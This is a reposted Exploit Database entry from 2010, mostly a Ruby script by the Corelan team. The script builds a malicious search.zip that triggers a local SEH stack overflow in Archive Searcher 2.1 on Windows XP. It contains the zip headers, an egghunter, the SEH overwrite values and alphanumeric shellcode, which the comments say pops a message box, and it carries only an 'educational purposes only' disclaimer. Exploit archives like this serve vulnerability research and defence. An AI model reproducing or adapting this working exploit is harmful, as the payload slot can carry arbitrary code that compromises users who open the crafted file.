Archive Searcher – ‘.zip’ Local Stack Overflow

Exploit Database
122 阅读

作者： Lincoln

日期： 2010-04-16
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/12261/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

#!/usr/bin/ruby

# Software: Archive Searcher 2.1

# Author: Lincoln

# OS: Windows

# Tested on : XP SP3 En (VirtualBox)

# Type of vuln: SEH

# Greetz to : Corelan Security Team

# http://www.corelan.be:8800/index.php/security/corelan-team-members/

# Script provided 'as is', without any warranty.

# Use for educational purposes only.

# Do not use this code to do anything illegal !

# Note : you are not allowed to edit/modify this code.

# If you do, Corelan cannot be held responsible for any damages this may cause.

# Search for file in application, ex: point to desktop and click seach now

# Character restrictions, upper case alpha converted, A -> a etc.

banner =

"|------------------------------------------------------------------|\n" +

"| __ __|\n" +

"| _________________/ /___ _____ / /________ _____ ___|\n" +

"|/ ___/ __ \\/ ___/ _ \\/ / __ <code>/ __ \\ / __/ _ \\/ __ </code>/ __ `__ \\ |\n" +

"| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n" +

"| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n" +

"||\n" +

"| http://www.corelan.be:8800 |\n" +

"||\n" +

"|-------------------------------------------------[ EIP Hunters ]--|\n\n"

print banner

puts "[+] Exploit for Archive Searcher 2.1"

#Zip Headers

header1=

"\x50\x4b\x03\x04\x14\x00\x00\x00" +

"\x00\x00\xb7\xac\xce\x34\x00\x00" +

"\x00\x00\x00\x00\x00\x00\x00\x00" +

"\x00\xe4\x0f\x00\x00\x00"

header2=

"\x50\x4b\x01\x02\x14\x00\x14\x00" +

"\x00\x00\x00\x00\xb7\xac\xce\x34" +

"\x00\x00\x00\x00\x00\x00\x00\x00" +

"\x00\x00\x00\x00\xe4\x0f\x00\x00" +

"\x00\x00\x00\x00\x01\x00\x24\x00" +

"\x00\x00\x00\x00\x00\x00"

header3=

"\x50\x4B\x05\x06\x00\x00\x00\x00" +

"\x01\x00\x01\x00\x12\x10\x00\x00" +

"\x02\x10\x00\x00\x00\x00"

#Align regs # jmp esi # jmp to egg

align=

"\x90\x90\xeb\x3b\x90\x90\x90\x61" +

"\x61\x61\x61\x61\x61\x61\x61\x61" +

"\x5e\x5e\x5e\x5e\x5e\xff\xe6"

#modified egghunter, mov edx,esi

egg =

"\x89\xf2\x42\x52\x6a\x02\x58\xcd" +

"\x2e\x3c\x05\x5a\x74\xef\xb8\x77" +

"\x30\x30\x74\x8B\xfa\xaf\x75\xea" +

"\xaf\x75\xe7\xff\xe7"

#msgbox: "Exploited by Corelan Security Team"

shellcode =

"w00tw00t" +

"\x89\xe3\xda\xd7\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x49" +

"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +

"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +

"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +

"\x75\x4a\x49\x4a\x79\x4a\x4b\x4d\x4b\x4b\x69\x51\x64\x45" +

"\x74\x4a\x54\x45\x61\x4e\x32\x4e\x52\x42\x5a\x46\x51\x49" +

"\x59\x42\x44\x4e\x6b\x51\x61\x44\x70\x4c\x4b\x43\x46\x44" +

"\x4c\x4e\x6b\x42\x56\x47\x6c\x4c\x4b\x51\x56\x44\x48\x4c" +

"\x4b\x51\x6e\x45\x70\x4e\x6b\x45\x66\x50\x38\x50\x4f\x47" +

"\x68\x50\x75\x4c\x33\x50\x59\x45\x51\x4b\x61\x4b\x4f\x48" +

"\x61\x51\x70\x4c\x4b\x50\x6c\x46\x44\x45\x74\x4c\x4b\x51" +

"\x55\x47\x4c\x4c\x4b\x50\x54\x43\x35\x50\x78\x43\x31\x4b" +

"\x5a\x4c\x4b\x42\x6a\x47\x68\x4e\x6b\x43\x6a\x47\x50\x45" +

"\x51\x4a\x4b\x48\x63\x46\x57\x50\x49\x4e\x6b\x44\x74\x4c" +

"\x4b\x45\x51\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4b\x70\x4b" +

"\x4c\x4e\x4c\x4f\x74\x4b\x70\x43\x44\x46\x6a\x4a\x61\x4a" +

"\x6f\x44\x4d\x47\x71\x4b\x77\x48\x69\x4a\x51\x4b\x4f\x49" +

"\x6f\x49\x6f\x45\x6b\x43\x4c\x45\x74\x51\x38\x51\x65\x49" +

"\x4e\x4e\x6b\x42\x7a\x45\x74\x45\x51\x4a\x4b\x43\x56\x4e" +

"\x6b\x46\x6c\x42\x6b\x4c\x4b\x43\x6a\x45\x4c\x43\x31\x4a" +

"\x4b\x4e\x6b\x45\x54\x4e\x6b\x47\x71\x4d\x38\x4f\x79\x51" +

"\x54\x46\x44\x47\x6c\x45\x31\x4a\x63\x4f\x42\x44\x48\x46" +

"\x49\x48\x54\x4f\x79\x4b\x55\x4d\x59\x49\x52\x50\x68\x4c" +

"\x4e\x50\x4e\x44\x4e\x48\x6c\x50\x52\x4b\x58\x4d\x4c\x4b" +

"\x4f\x49\x6f\x4b\x4f\x4f\x79\x51\x55\x46\x64\x4d\x6b\x51" +

"\x6e\x49\x48\x4d\x32\x51\x63\x4c\x47\x45\x4c\x44\x64\x51" +

"\x42\x4d\x38\x4e\x6b\x49\x6f\x49\x6f\x4b\x4f\x4c\x49\x42" +

"\x65\x47\x78\x43\x58\x42\x4c\x50\x6c\x45\x70\x4b\x4f\x51" +

"\x78\x47\x43\x45\x62\x46\x4e\x45\x34\x45\x38\x51\x65\x51" +

"\x63\x45\x35\x44\x32\x4d\x58\x51\x4c\x44\x64\x44\x4a\x4c" +

"\x49\x48\x66\x43\x66\x4b\x4f\x43\x65\x46\x64\x4c\x49\x4b" +

"\x72\x50\x50\x4d\x6b\x4e\x48\x4c\x62\x50\x4d\x4d\x6c\x4e" +

"\x67\x47\x6c\x47\x54\x46\x32\x4b\x58\x43\x6e\x49\x6f\x49" +

"\x6f\x49\x6f\x42\x48\x51\x74\x45\x71\x51\x48\x45\x70\x43" +

"\x58\x44\x30\x43\x47\x42\x4e\x42\x45\x44\x71\x4b\x6b\x4b" +

"\x38\x43\x6c\x45\x74\x46\x66\x4b\x39\x48\x63\x45\x38\x50" +

"\x61\x42\x4d\x50\x58\x45\x70\x51\x78\x42\x59\x45\x70\x50" +

"\x54\x51\x75\x51\x78\x44\x35\x43\x42\x50\x69\x51\x64\x43" +

"\x58\x51\x30\x43\x63\x45\x35\x43\x53\x51\x78\x42\x45\x42" +

"\x4c\x50\x61\x50\x6e\x42\x48\x51\x30\x51\x53\x50\x6f\x50" +

"\x72\x45\x38\x43\x54\x51\x30\x50\x62\x43\x49\x51\x78\x42" +

"\x4f\x43\x59\x42\x54\x50\x65\x51\x78\x42\x65\x51\x68\x42" +

"\x50\x50\x6c\x46\x51\x48\x49\x4e\x68\x50\x4c\x46\x44\x45" +

"\x72\x4d\x59\x49\x71\x44\x71\x4a\x72\x43\x62\x43\x63\x50" +

"\x51\x46\x32\x4b\x4f\x48\x50\x50\x31\x4f\x30\x46\x30\x4b" +

"\x4f\x51\x45\x44\x48\x45\x5a\x41\x41"

size = 4064

junk = "\x90" * (267 - (align.length + egg.length))

jseh = "\xe9\xf7\xfe\xff\xff" #jmp back to popad's

nseh = "\xeb\xf9\x90\x90" #jmp back to near jump

seh= "\x0c\x14\x40\x00" #universal

payload = align + egg + junk + jseh + nseh + seh + shellcode

rest = "D" * (size - payload.length)

final = payload + rest + ".txt"

filename = "search.zip"

f = File.new(filename, 'w')

f.write header1 + final + header2 + final + header3

f.close

puts "[+] file size :#{final.length}"

puts "[+] Wrote exploit file : #{filename}"

puts "[+] Search for zip and boom!\n\n"